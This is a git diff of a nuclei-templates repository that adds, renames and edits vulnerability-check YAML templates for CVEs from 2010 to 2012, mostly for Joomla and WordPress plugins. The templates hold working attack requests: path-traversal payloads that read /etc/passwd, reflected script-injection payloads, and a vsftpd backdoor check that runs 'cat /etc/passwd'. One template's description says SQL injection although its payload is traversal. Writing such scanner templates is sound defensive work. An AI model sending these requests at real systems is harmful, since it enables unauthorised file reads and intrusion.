" @@ -45,5 +61,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/03/02 +# digest: 490a0046304402207ae0781d6298d63fef1e109c6941979f3a9cf2cf97cf52d54fbf5506d103256d02202ab0a38916296abc146346b756d193740490f3a762c1929bf019e92da272776c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2010/cve-2010-0759.yaml b/nuclei-templates/CVE-2010/cve-2010-0759.yaml new file mode 100644 index 0000000000..85c6ddd98e --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-0759.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-0759 + +info: + name: Joomla! Plugin Core Design Scriptegrator - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php in the Core Design Scriptegrator plugin 1.4.1 for Joomla! allows remote attackers to read, and possibly include and execute, arbitrary files via directory traversal sequences in the files[] parameter. + reference: + - https://www.exploit-db.com/exploits/11498 + - https://www.cvedetails.com/cve/CVE-2010-0759 + tags: cve,cve2010,joomla,lfi,plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2010/CVE-2010-0942.yaml b/nuclei-templates/CVE-2010/cve-2010-0942.yaml similarity index 100% rename from nuclei-templates/CVE-2010/CVE-2010-0942.yaml rename to nuclei-templates/CVE-2010/cve-2010-0942.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-0944.yaml b/nuclei-templates/CVE-2010/cve-2010-0944.yaml similarity index 100% rename from nuclei-templates/CVE-2010/CVE-2010-0944.yaml rename to nuclei-templates/CVE-2010/cve-2010-0944.yaml diff --git a/nuclei-templates/CVE-2010/cve-2010-1081.yaml b/nuclei-templates/CVE-2010/cve-2010-1081.yaml new file mode 100644 index 0000000000..39650b4327 --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-1081.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1081 + +info: + name: Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/11511 + - https://www.cvedetails.com/cve/CVE-2010-1081 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2010/CVE-2010-1217.yaml b/nuclei-templates/CVE-2010/cve-2010-1217.yaml similarity index 100% rename from nuclei-templates/CVE-2010/CVE-2010-1217.yaml rename to nuclei-templates/CVE-2010/cve-2010-1217.yaml diff --git a/nuclei-templates/CVE-2010/cve-2010-1302.yaml b/nuclei-templates/CVE-2010/cve-2010-1302.yaml new file mode 100644 index 0000000000..90c52b2f83 --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-1302.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1302 + +info: + name: Joomla! Component DW Graph - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/11978 + - https://www.cvedetails.com/cve/CVE-2010-1302 + tags: cve,cve2010,joomla,lfi,graph + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1352.yaml b/nuclei-templates/CVE-2010/cve-2010-1352.yaml similarity index 100% rename from nuclei-templates/CVE-2010/CVE-2010-1352.yaml rename to nuclei-templates/CVE-2010/cve-2010-1352.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-1353.yaml b/nuclei-templates/CVE-2010/cve-2010-1353.yaml similarity index 100% rename from nuclei-templates/CVE-2010/CVE-2010-1353.yaml rename to nuclei-templates/CVE-2010/cve-2010-1353.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-1354.yaml b/nuclei-templates/CVE-2010/cve-2010-1354.yaml similarity index 100% rename from nuclei-templates/CVE-2010/CVE-2010-1354.yaml rename to nuclei-templates/CVE-2010/cve-2010-1354.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-1472.yaml b/nuclei-templates/CVE-2010/cve-2010-1472.yaml similarity index 100% rename from nuclei-templates/CVE-2010/CVE-2010-1472.yaml rename to nuclei-templates/CVE-2010/cve-2010-1472.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-1473.yaml b/nuclei-templates/CVE-2010/cve-2010-1473.yaml similarity index 100% rename from nuclei-templates/CVE-2010/CVE-2010-1473.yaml rename to nuclei-templates/CVE-2010/cve-2010-1473.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-1491.yaml b/nuclei-templates/CVE-2010/cve-2010-1491.yaml similarity index 100% rename from nuclei-templates/CVE-2010/CVE-2010-1491.yaml rename to nuclei-templates/CVE-2010/cve-2010-1491.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-1531.yaml b/nuclei-templates/CVE-2010/cve-2010-1531.yaml similarity index 100% rename from nuclei-templates/CVE-2010/CVE-2010-1531.yaml rename to nuclei-templates/CVE-2010/cve-2010-1531.yaml diff --git a/nuclei-templates/CVE-2010/cve-2010-1532.yaml b/nuclei-templates/CVE-2010/cve-2010-1532.yaml new file mode 100644 index 0000000000..594664996b --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-1532.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1532 + +info: + name: Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the givesight PowerMail Pro (com_powermail) component 1.5.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12118 + - https://www.cvedetails.com/cve/CVE-2010-1532 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1601.yaml b/nuclei-templates/CVE-2010/cve-2010-1601.yaml similarity index 100% rename from nuclei-templates/CVE-2010/CVE-2010-1601.yaml rename to nuclei-templates/CVE-2010/cve-2010-1601.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-1657.yaml b/nuclei-templates/CVE-2010/cve-2010-1657.yaml similarity index 100% rename from nuclei-templates/CVE-2010/CVE-2010-1657.yaml rename to nuclei-templates/CVE-2010/cve-2010-1657.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-1718.yaml b/nuclei-templates/CVE-2010/cve-2010-1718.yaml similarity index 100% rename from nuclei-templates/CVE-2010/CVE-2010-1718.yaml rename to nuclei-templates/CVE-2010/cve-2010-1718.yaml diff --git a/nuclei-templates/CVE-2010/cve-2010-1723.yaml b/nuclei-templates/CVE-2010/cve-2010-1723.yaml new file mode 100644 index 0000000000..4b5060444b --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-1723.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1723 + +info: + name: Joomla! Component iNetLanka Contact Us Draw Root Map 1.1 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the iNetLanka Contact Us Draw Root Map (com_drawroot) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12289 + - https://www.cvedetails.com/cve/CVE-2010-1723 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_drawroot&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2010/CVE-2010-1979.yaml b/nuclei-templates/CVE-2010/cve-2010-1979.yaml similarity index 100% rename from nuclei-templates/CVE-2010/CVE-2010-1979.yaml rename to nuclei-templates/CVE-2010/cve-2010-1979.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-2036.yaml b/nuclei-templates/CVE-2010/cve-2010-2036.yaml similarity index 100% rename from nuclei-templates/CVE-2010/CVE-2010-2036.yaml rename to nuclei-templates/CVE-2010/cve-2010-2036.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-2050.yaml b/nuclei-templates/CVE-2010/cve-2010-2050.yaml similarity index 100% rename from nuclei-templates/CVE-2010/CVE-2010-2050.yaml rename to nuclei-templates/CVE-2010/cve-2010-2050.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-2128.yaml b/nuclei-templates/CVE-2010/cve-2010-2128.yaml similarity index 100% rename from nuclei-templates/CVE-2010/CVE-2010-2128.yaml rename to nuclei-templates/CVE-2010/cve-2010-2128.yaml diff --git a/nuclei-templates/CVE-2010/cve-2010-2259.yaml b/nuclei-templates/CVE-2010/cve-2010-2259.yaml new file mode 100644 index 0000000000..0d38e58882 --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-2259.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-2259 + +info: + name: Joomla! Component com_bfsurvey - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the BF Survey (com_bfsurvey) component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/10946 + - https://www.cvedetails.com/cve/CVE-2010-2259 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-2857.yaml b/nuclei-templates/CVE-2010/cve-2010-2857.yaml new file mode 100644 index 0000000000..1478adabab --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-2857.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-2857 + +info: + name: Joomla! Component Music Manager - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Music Manager component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the cid parameter to album.html. + reference: | + - https://www.exploit-db.com/exploits/14274 + - https://www.cvedetails.com/cve/CVE-2010-2857 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/component/music/album.html?cid=../../../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2010/cve-2010-2918.yaml b/nuclei-templates/CVE-2010/cve-2010-2918.yaml new file mode 100644 index 0000000000..b8ddd64eb5 --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-2918.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-2918 + +info: + name: Joomla! Component Visites 1.1 - MosConfig_absolute_path Remote File Inclusion + author: daffainfo + severity: high + description: PHP remote file inclusion vulnerability in core/include/myMailer.class.php in the Visites (com_joomla-visites) component 1.1 RC2 for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter. + reference: + - https://www.exploit-db.com/exploits/31708 + - https://www.cvedetails.com/cve/CVE-2010-2918 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2010/CVE-2010-3203.yaml b/nuclei-templates/CVE-2010/cve-2010-3203.yaml similarity index 100% rename from nuclei-templates/CVE-2010/CVE-2010-3203.yaml rename to nuclei-templates/CVE-2010/cve-2010-3203.yaml diff --git a/nuclei-templates/CVE-2010/CVE-2010-4239.yaml b/nuclei-templates/CVE-2010/cve-2010-4239.yaml similarity index 100% rename from nuclei-templates/CVE-2010/CVE-2010-4239.yaml rename to nuclei-templates/CVE-2010/cve-2010-4239.yaml diff --git a/nuclei-templates/CVE-2010/cve-2010-4977.yaml b/nuclei-templates/CVE-2010/cve-2010-4977.yaml new file mode 100644 index 0000000000..eb135d7ccc --- /dev/null +++ b/nuclei-templates/CVE-2010/cve-2010-4977.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-4977 + +info: + name: Joomla! Component Canteen 1.0 - Local File Inclusion + author: daffainfo + severity: high + description: SQL injection vulnerability in menu.php in the Canteen (com_canteen) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the mealid parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/34250 + - https://www.cvedetails.com/cve/CVE-2010-4977 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_canteen&controller=../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2011/CVE-2011-0049.yaml b/nuclei-templates/CVE-2011/CVE-2011-0049.yaml deleted file mode 100644 index 2610cba7eb..0000000000 --- a/nuclei-templates/CVE-2011/CVE-2011-0049.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2011-0049 -info: - name: Majordomo2 - SMTP/HTTP Directory Traversal - author: pikpikcu - severity: high - description: A directory traversal vulnerability in the _list_file_get function in lib/Majordomo.pm in Majordomo 2 before 20110131 allows remote attackers to read arbitrary files via .. (dot dot) sequences in the help command, as demonstrated using (1) a crafted email and (2) cgi-bin/mj_wwwusr in the web interface. - reference: - - https://www.exploit-db.com/exploits/16103 - - https://nvd.nist.gov/vuln/detail/CVE-2011-0063 - - http://www.kb.cert.org/vuls/id/363726 - - https://bug628064.bugzilla.mozilla.org/attachment.cgi?id=506481 - remediation: Upgrade to a supported version. - classification: - cve-id: CVE-2011-0049 - tags: cve,cve2011,majordomo2,lfi -requests: - - method: GET - path: - - "{{BaseURL}}/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - condition: and - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/18 diff --git a/nuclei-templates/CVE-2011/cve-2011-1669.yaml b/nuclei-templates/CVE-2011/CVE-2011-1669.yaml similarity index 100% rename from nuclei-templates/CVE-2011/cve-2011-1669.yaml rename to nuclei-templates/CVE-2011/CVE-2011-1669.yaml diff --git a/nuclei-templates/CVE-2011/CVE-2011-2523.yaml b/nuclei-templates/CVE-2011/CVE-2011-2523.yaml index 4e5159ea65..2991dbe5a7 100644 --- a/nuclei-templates/CVE-2011/CVE-2011-2523.yaml +++ b/nuclei-templates/CVE-2011/CVE-2011-2523.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands with the privileges of the FTP server. remediation: | Update to the latest version of VSFTPD, which does not contain the backdoor. reference: @@ -27,7 +29,7 @@ info: vendor: vsftpd_project product: vsftpd shodan-query: product:"vsftpd" - tags: cve,cve2011,network,vsftpd,ftp,backdoor + tags: cve2011,network,cve,vsftpd,ftp,backdoor,vsftpd_project variables: cmd: "cat /etc/passwd" # shows the the user and group names and numeric IDs tcp: @@ -48,3 +50,4 @@ tcp: part: raw regex: - "root:.*:0:0:" +# digest: 4b0a00483046022100e91175cf5530607c72f21d98cc11af232b725a8b9568cb77a38e3bdbb40bcbac022100c3dc0038065f8cb4fab32e93610505a54456629241fa5ae3d32caa620a126772:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2011/CVE-2011-4336.yaml b/nuclei-templates/CVE-2011/CVE-2011-4336.yaml deleted file mode 100644 index a9e81fe109..0000000000 --- a/nuclei-templates/CVE-2011/CVE-2011-4336.yaml +++ /dev/null @@ -1,41 +0,0 @@ -id: CVE-2011-4336 - -info: - name: Tiki Wiki CMS Groupware 7.0 Cross-Site Scripting - author: pikpikcu - severity: medium - description: Tiki Wiki CMS Groupware 7.0 is vulnerable to cross-site scripting via the GET "ajax" parameter to snarf_ajax.php. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2011-4336 - - http://web.archive.org/web/20210328232945/https://www.securityfocus.com/bid/48806/info - - https://seclists.org/bugtraq/2011/Nov/140 - remediation: Upgrade to a supported version. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2011-4336 - cwe-id: CWE-79 - tags: cve,cve2011,xss,tikiwiki - -requests: - - method: GET - path: - - "{{BaseURL}}/snarf_ajax.php?url=1&ajax=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - matchers-condition: and - matchers: - - type: word - words: - - '' - part: body - - - type: status - status: - - 200 - - - type: word - part: header - words: - - text/html - -# Enhanced by mp on 2022/02/18 diff --git a/nuclei-templates/CVE-2011/CVE-2011-4624.yaml b/nuclei-templates/CVE-2011/CVE-2011-4624.yaml index d172e1768a..2ae32f0d66 100644 --- a/nuclei-templates/CVE-2011/CVE-2011-4624.yaml +++ b/nuclei-templates/CVE-2011/CVE-2011-4624.yaml @@ -1,24 +1,30 @@ id: CVE-2011-4624 + info: name: GRAND FlAGallery 1.57 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: Cross-site scripting (XSS) vulnerability in facebook.php in the GRAND FlAGallery plugin (flash-album-gallery) before 1.57 for WordPress allows remote attackers to inject arbitrary web script or HTML via the i parameter. reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4624 tags: cve,cve2011,wordpress,xss,wp-plugin + requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + - '{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + matchers-condition: and matchers: - type: word words: - - "" + - "" part: body + - type: word part: header words: - text/html + - type: status status: - 200 diff --git a/nuclei-templates/CVE-2011/CVE-2011-4926.yaml b/nuclei-templates/CVE-2011/CVE-2011-4926.yaml deleted file mode 100644 index cec37d272f..0000000000 --- a/nuclei-templates/CVE-2011/CVE-2011-4926.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2011-4926 -info: - name: Adminimize 1.7.22 - Reflected Cross-Site Scripting - author: daffainfo - severity: medium - description: A cross-site scripting vulnerability in adminimize/adminimize_page.php in the Adminimize plugin before 1.7.22 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2011-4926 - - https://www.whitesourcesoftware.com/vulnerability-database/CVE-2011-4926 - - http://plugins.trac.wordpress.org/changeset?reponame=&new=467338@adminimize&old=466900@adminimize#file5 - - http://www.openwall.com/lists/oss-security/2012/01/10/9 - classification: - cve-id: CVE-2011-4926 - tags: cve,cve2011,wordpress,xss,wp-plugin -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/21 diff --git a/nuclei-templates/CVE-2011/cve-2011-5107.yaml b/nuclei-templates/CVE-2011/CVE-2011-5107.yaml similarity index 100% rename from nuclei-templates/CVE-2011/cve-2011-5107.yaml rename to nuclei-templates/CVE-2011/CVE-2011-5107.yaml diff --git a/nuclei-templates/CVE-2011/cve-2011-5179.yaml b/nuclei-templates/CVE-2011/CVE-2011-5179.yaml similarity index 100% rename from nuclei-templates/CVE-2011/cve-2011-5179.yaml rename to nuclei-templates/CVE-2011/CVE-2011-5179.yaml diff --git a/nuclei-templates/CVE-2011/CVE-2011-5181.yaml b/nuclei-templates/CVE-2011/CVE-2011-5181.yaml deleted file mode 100644 index dc2943fa8d..0000000000 --- a/nuclei-templates/CVE-2011/CVE-2011-5181.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2011-5181 - -info: - name: ClickDesk Live Support Live Chat 2.0 - Reflected Cross-Site Scripting - author: daffainfo - severity: medium - description: A cross-site scripting vulnerability in clickdesk.php in ClickDesk Live Support - Live Chat plugin 2.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cdwidgetid parameter. - reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5181 - tags: cve,cve2011,wordpress,xss,wp-plugin - classification: - cve-id: CVE-2011-5181 - -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/02/21 diff --git a/nuclei-templates/CVE-2011/CVE-2011-5252.yaml b/nuclei-templates/CVE-2011/CVE-2011-5252.yaml index e6242ec0da..50d55fd1ce 100644 --- a/nuclei-templates/CVE-2011/CVE-2011-5252.yaml +++ b/nuclei-templates/CVE-2011/CVE-2011-5252.yaml @@ -6,20 +6,29 @@ info: severity: medium description: | Open redirect vulnerability in Users/Account/LogOff in Orchard 1.0.x before 1.0.21, 1.1.x before 1.1.31, 1.2.x before 1.2.42, and 1.3.x before 1.3.10 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the ReturnUrl parameter. + impact: | + An attacker can craft a malicious URL to redirect users to a malicious website, leading to phishing attacks. + remediation: | + Validate and sanitize user input for the 'ReturnUrl' parameter to prevent open redirect vulnerabilities. reference: - https://www.exploit-db.com/exploits/36493 - https://nvd.nist.gov/vuln/detail/CVE-2011-5252 - https://www.invicti.com/web-applications-advisories/open-redirection-vulnerability-in-orchard/ - https://exchange.xforce.ibmcloud.com/vulnerabilities/72110 + - http://orchard.codeplex.com/discussions/283667 classification: - cvss-metrics: AV:N/AC:M/Au:N/C:P/I:P/A:N + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:N cvss-score: 5.8 cve-id: CVE-2011-5252 cwe-id: CWE-20 + epss-score: 0.02536 + epss-percentile: 0.89931 cpe: cpe:2.3:a:orchardproject:orchard:1.0:*:*:*:*:*:*:* metadata: max-request: 1 - tags: cve,cve2011,redirect,orchard + vendor: orchardproject + product: orchard + tags: cve,cve2011,redirect,orchard,orchardproject http: - method: GET @@ -31,3 +40,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' +# digest: 4a0a0047304502200b2fd44a350bfac8b9bac4f7f86aeb7a8019759723bee2617c7e051c86595fff022100dcf8de39a664b6126476f780592008d1e2b96bd8c83db51134cc0d55ceac2719:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2011/cve-2011-5265.yaml b/nuclei-templates/CVE-2011/CVE-2011-5265.yaml similarity index 100% rename from nuclei-templates/CVE-2011/cve-2011-5265.yaml rename to nuclei-templates/CVE-2011/CVE-2011-5265.yaml diff --git a/nuclei-templates/CVE-2011/cve-2011-0049.yaml b/nuclei-templates/CVE-2011/cve-2011-0049.yaml new file mode 100644 index 0000000000..f916e1470c --- /dev/null +++ b/nuclei-templates/CVE-2011/cve-2011-0049.yaml @@ -0,0 +1,29 @@ +id: CVE-2011-0049 + +info: + name: Majordomo2 - SMTP/HTTP Directory Traversal + author: pikpikcu + severity: high + description: Directory traversal vulnerability in the _list_file_get function in lib/Majordomo.pm in Majordomo 2 before 20110131 allows remote attackers to read arbitrary files via .. (dot dot) sequences in the help command, as demonstrated using (1) a crafted email and (2) cgi-bin/mj_wwwusr in the web interface. + reference: + - https://www.exploit-db.com/exploits/16103 + - https://nvd.nist.gov/vuln/detail/CVE-2011-0063 + - http://www.kb.cert.org/vuls/id/363726 + tags: cve,cve2011,majordomo2,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + condition: and + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2011/cve-2011-4336.yaml b/nuclei-templates/CVE-2011/cve-2011-4336.yaml new file mode 100644 index 0000000000..1fe124e5d4 --- /dev/null +++ b/nuclei-templates/CVE-2011/cve-2011-4336.yaml @@ -0,0 +1,38 @@ +id: CVE-2011-4336 + +info: + name: Tiki Wiki CMS Groupware 7.0 has XSS + author: pikpikcu + severity: medium + description: Tiki Wiki CMS Groupware 7.0 has XSS via the GET "ajax" parameter to snarf_ajax.php. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2011-4336 + - https://www.securityfocus.com/bid/48806/info + - https://seclists.org/bugtraq/2011/Nov/140 + tags: cve,cve2011,xss,tikiwiki + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2011-4336 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - "{{BaseURL}}/snarf_ajax.php?url=1&ajax=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - '' + part: body + + - type: status + status: + - 200 + + - type: word + part: header + words: + - text/html diff --git a/nuclei-templates/CVE-2011/cve-2011-4926.yaml b/nuclei-templates/CVE-2011/cve-2011-4926.yaml new file mode 100644 index 0000000000..bbefdb8002 --- /dev/null +++ b/nuclei-templates/CVE-2011/cve-2011-4926.yaml @@ -0,0 +1,30 @@ +id: CVE-2011-4926 + +info: + name: Adminimize 1.7.22 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: Cross-site scripting (XSS) vulnerability in adminimize/adminimize_page.php in the Adminimize plugin before 1.7.22 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter. + reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4926 + tags: cve,cve2011,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2011/cve-2011-5181.yaml b/nuclei-templates/CVE-2011/cve-2011-5181.yaml new file mode 100644 index 0000000000..c7e74be15b --- /dev/null +++ b/nuclei-templates/CVE-2011/cve-2011-5181.yaml @@ -0,0 +1,30 @@ +id: CVE-2011-5181 + +info: + name: ClickDesk Live Support Live Chat 2.0 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: Cross-site scripting (XSS) vulnerability in clickdesk.php in ClickDesk Live Support - Live Chat plugin 2.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cdwidgetid parameter. + reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5181 + tags: cve,cve2011,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2012/CVE-2012-0392.yaml b/nuclei-templates/CVE-2012/CVE-2012-0392.yaml index c1f5562e4e..a6d6be2810 100644 --- a/nuclei-templates/CVE-2012/CVE-2012-0392.yaml +++ b/nuclei-templates/CVE-2012/CVE-2012-0392.yaml @@ -5,12 +5,8 @@ info: author: pikpikcu severity: critical description: The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use the parameter-name whitelist, which allows remote attackers to execute arbitrary commands via a crafted HTTP Cookie header that triggers Java code execution through a static method. - remediation: Developers should immediately upgrade to at least Struts 2.3.18. - reference: https://cwiki.apache.org/confluence/display/WW/S2-008 - https://blog.csdn.net/weixin_43416469/article/details/113850545 + reference: 